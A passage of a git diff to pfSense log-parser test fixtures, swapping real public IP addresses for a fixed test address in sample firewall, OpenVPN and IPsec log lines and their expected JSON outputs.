3215, + "number": 4837, "organization": { - "name": "Orange" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "90.92.7.206", + "address": "175.16.199.1", "port": 500, - "ip": "90.92.7.206" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } }, - "address": "28.130.181.102", + "address": "175.16.199.1", "port": 500, - "ip": "28.130.181.102" + "ip": "175.16.199.1" }, - "message": "14[NET] \u003ccon1000|11\u003e sending packet: from 28.130.181.102[500] to 90.92.7.206[500] (464 bytes)", + "message": "14[NET] \u003ccon1000|11\u003e sending packet: from 175.16.199.1[500] to 175.16.199.1[500] (464 bytes)", "tags": [ "preserve_original_event" ], @@ -828,13 +835,12 @@ }, "related": { "ip": [ - "90.92.7.206", - "28.130.181.102" + "175.16.199.1" ] }, "event": { - "ingested": "2021-09-14T22:09:19.816355582Z", - "original": "\u003c30\u003e1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] \u003ccon1000|11\u003e sending packet: from 28.130.181.102[500] to 90.92.7.206[500] (464 bytes)", + "ingested": "2021-12-09T13:44:39.878382400Z", + "original": "\u003c30\u003e1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] \u003ccon1000|11\u003e sending packet: from 175.16.199.1[500] to 175.16.199.1[500] (464 bytes)", "provider": "charon", "timezone": "-05:00", "kind": "event", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log index 7ab6528ea55..2a53865ef7d 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log @@ -8,5 +8,5 @@ <29>Jul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849 <37>Jul 3 21:42:57 openvpn[19830]: user 'bob' authenticated <29>Jul 3 21:42:57 openvpn[66026]: bob/10.170.120.149:37849 MULTI_sva: pool returned IPv4=10.170.170.2, IPv6=(Not enabled) -<27>1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]146.88.240.4:34745 +<27>1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745 <36>1 2021-07-03T22:40:38.477134-05:00 pfSense.example.com openvpn 68813 - - user 'bob' could not authenticate. \ No newline at end of file diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json index 2ba0831fe67..8e165c1184f 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json @@ -33,7 +33,7 @@ ] }, "event": { - "ingested": "2021-09-14T22:09:25.467660790Z", + "ingested": "2021-12-09T13:44:41.123205100Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_VER=3.git:released:662eae9a:Release", "provider": "openvpn", "timezone": "-04:00", @@ -80,7 +80,7 @@ ] }, "event": { - "ingested": "2021-09-14T22:09:25.467669216Z", + "ingested": "2021-12-09T13:44:41.123224800Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_PLAT=android", "provider": "openvpn", "timezone": "-04:00", @@ -127,7 +127,7 @@ ] }, "event": { - "ingested": "2021-09-14T22:09:25.467672078Z", + "ingested": "2021-12-09T13:44:41.123247400Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_NCP=2", "provider": "openvpn", "timezone": "-04:00", @@ -174,7 +174,7 @@ ] }, "event": { - "ingested": "2021-09-14T22:09:25.467674717Z", + "ingested": "2021-12-09T13:44:41.123253200Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_TCPNL=1", "provider": "openvpn", "timezone": "-04:00", @@ -221,7 +221,7 @@ ] }, "event": { - "ingested": "2021-09-14T22:09:25.467677398Z", + "ingested": "2021-12-09T13:44:41.123258500Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_GUI_VER=net.openvpn.connect.android_3.2.4-5891", "provider": "openvpn", "timezone": "-04:00", @@ -268,7 +268,7 @@ ] }, "event": { - "ingested": "2021-09-14T22:09:25.467680063Z", + "ingested": "2021-12-09T13:44:41.123264100Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_PROTO=2", "provider": "openvpn", "timezone": "-04:00", @@ -315,7 +315,7 @@ ] }, "event": { - "ingested": "2021-09-14T22:09:25.467682683Z", + "ingested": "2021-12-09T13:44:41.123269400Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_SSO=openurl", "provider": "openvpn", "timezone": "-04:00", @@ -357,7 +357,7 @@ ] }, "event": { - "ingested": "2021-09-14T22:09:25.467685342Z", + "ingested": "2021-12-09T13:44:41.123274700Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849", "provider": "openvpn", "timezone": "-04:00", @@ -386,7 +386,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:25.467687961Z", + "ingested": "2021-12-09T13:44:41.123280Z", "original": "\u003c37\u003eJul 3 21:42:57 openvpn[19830]: user 'bob' authenticated", "provider": "openvpn", "timezone": "-04:00", @@ -440,7 +440,7 @@ ] }, "event": { - "ingested": "2021-09-14T22:09:25.467690599Z", + "ingested": "2021-12-09T13:44:41.123283900Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: bob/10.170.120.149:37849 MULTI_sva: pool returned IPv4=10.170.170.2, IPv6=(Not enabled)", "provider": "openvpn", "timezone": "-04:00", @@ -465,25 +465,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 20052, + "number": 4837, "organization": { - "name": "Arbor Networks, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "146.88.240.4", + "address": "175.16.199.1", "port": 34745, - "ip": "146.88.240.4" + "ip": "175.16.199.1" }, - "message": "TLS Error: cannot locate HMAC in incoming packet from [AF_INET]146.88.240.4:34745", + "message": "TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745", "tags": [ "preserve_original_event" ], @@ -499,12 +501,12 @@ }, "related": { "ip": [ - "146.88.240.4" + "175.16.199.1" ] }, "event": { - "ingested": "2021-09-14T22:09:25.467693239Z", - "original": "\u003c27\u003e1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]146.88.240.4:34745", + "ingested": "2021-12-09T13:44:41.123288200Z", + "original": "\u003c27\u003e1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745", "provider": "openvpn", "timezone": "-05:00", "kind": "event", @@ -533,7 +535,7 @@ }, "message": "user 'bob' could not authenticate.", "event": { - "ingested": "2021-09-14T22:09:25.467696022Z", + "ingested": "2021-12-09T13:44:41.123293100Z", "original": "\u003c36\u003e1 2021-07-03T22:40:38.477134-05:00 pfSense.example.com openvpn 68813 - - user 'bob' could not authenticate.", "provider": "openvpn", "timezone": "-05:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log index d2f6725f25e..1d883a80c93 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log @@ -1,14 +1,14 @@ -<134>1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale -<134>1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale <134>1 2021-07-03T19:10:14.578333-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,63,29559,0,DF,17,udp,69,10.170.27.50,10.170.27.1,52797,53,49 -<134>1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale -<134>1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale <134>1 2021-07-03T19:10:14.578380-05:00 pfSense.example.com filterlog 72237 - - 118,,,1534283903,igb1.12,match,pass,in,4,0x0,,64,58337,0,DF,6,tcp,64,10.170.12.21,127.0.0.1,62132,53,0,S,3671644853,,32768,,mss;nop;wscale;sackOK;nop;nop;nop;nop;TS -<134>1 2021-07-03T19:10:15.590254-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale -<134>1 2021-07-03T19:10:15.590217-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:15.590254-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:15.590217-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale <134>1 2021-07-03T19:10:15.590279-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,3666,0,DF,17,udp,69,10.170.27.9,10.170.27.1,26641,53,49 <134>1 2021-07-03T19:10:15.590303-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,51896,0,DF,17,udp,69,10.170.27.9,192.168.1.1,26641,53,49 -<134>1 2021-07-03T19:10:15.590325-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale -<134>1 2021-07-03T19:10:15.590347-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale -<134>1 2021-07-03T19:10:15.590370-05:00 pfSense.example.com filterlog 72237 - - 183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,239.255.255.250,58037,1900,180 +<134>1 2021-07-03T19:10:15.590325-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:15.590347-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:15.590370-05:00 pfSense.example.com filterlog 72237 - - 183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,175.16.199.1,58037,1900,180 <134>1 2021-09-14T15:31:58.860079-05:00 pfSense.example.com filterlog 72913 - - 176,,,1520797901,igb1.50,ip-option,pass,in,4,0xc0,,1,20651,0,none,2,igmp,32,10.100.10.23,224.0.0.1,datalength=8 \ No newline at end of file diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json index 21ed8782ba9..dbea9bd7326 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json @@ -8,23 +8,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -34,12 +36,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:wy1ypTt8ds5FMl3xQEEgnZtVBL4=", + "community_id": "1:pOXVyPJTFJI5seusI/UD6SwvBjg=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -84,14 +86,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594583565Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068506700Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -114,23 +116,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -140,12 +144,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:pYmzVSkpHUdj0FpkFumL9qhVekw=", + "community_id": "1:Fa19AzfMhQ0hUzFzVlg0elr6vsY=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -190,14 +194,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594592383Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068515300Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -278,7 +282,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594595221Z", + "ingested": "2021-12-09T13:44:42.068520900Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578333-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,63,29559,0,DF,17,udp,69,10.170.27.50,10.170.27.1,52797,53,49", "provider": "filterlog", "timezone": "-05:00", @@ -302,23 +306,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -328,12 +334,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ZySv0XsmlfDuW4lM8tpl7gn3EQk=", + "community_id": "1:tAqWDtAfj7j5rMNBDeS+QrkMsuE=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -378,14 +384,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594597853Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068526200Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -408,23 +414,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -434,12 +442,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:x3HLD/mdNyapXWjulF1YXRSQPZQ=", + "community_id": "1:aegOV8wdmNfz6BR84Lx6HaGqkEs=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -484,14 +492,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594600456Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068531500Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -585,7 +593,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594603049Z", + "ingested": "2021-12-09T13:44:42.068536800Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578380-05:00 pfSense.example.com filterlog 72237 - - 118,,,1534283903,igb1.12,match,pass,in,4,0x0,,64,58337,0,DF,6,tcp,64,10.170.12.21,127.0.0.1,62132,53,0,S,3671644853,,32768,,mss;nop;wscale;sackOK;nop;nop;nop;nop;TS", "provider": "filterlog", "timezone": "-05:00", @@ -609,26 +617,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -638,12 +645,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:iPfvojX0zag/qQ6zKR3MnpIlYx8=", + "community_id": "1:n6e31n2xF55JR2WREtsRUpXlkf0=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -688,14 +695,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594605680Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:15.590254-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068542100Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:15.590254-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -718,23 +725,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -744,12 +753,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:x3HLD/mdNyapXWjulF1YXRSQPZQ=", + "community_id": "1:aegOV8wdmNfz6BR84Lx6HaGqkEs=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -794,14 +803,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594608307Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:15.590217-05:00 pfSense.example.com filterlog 72237 - - 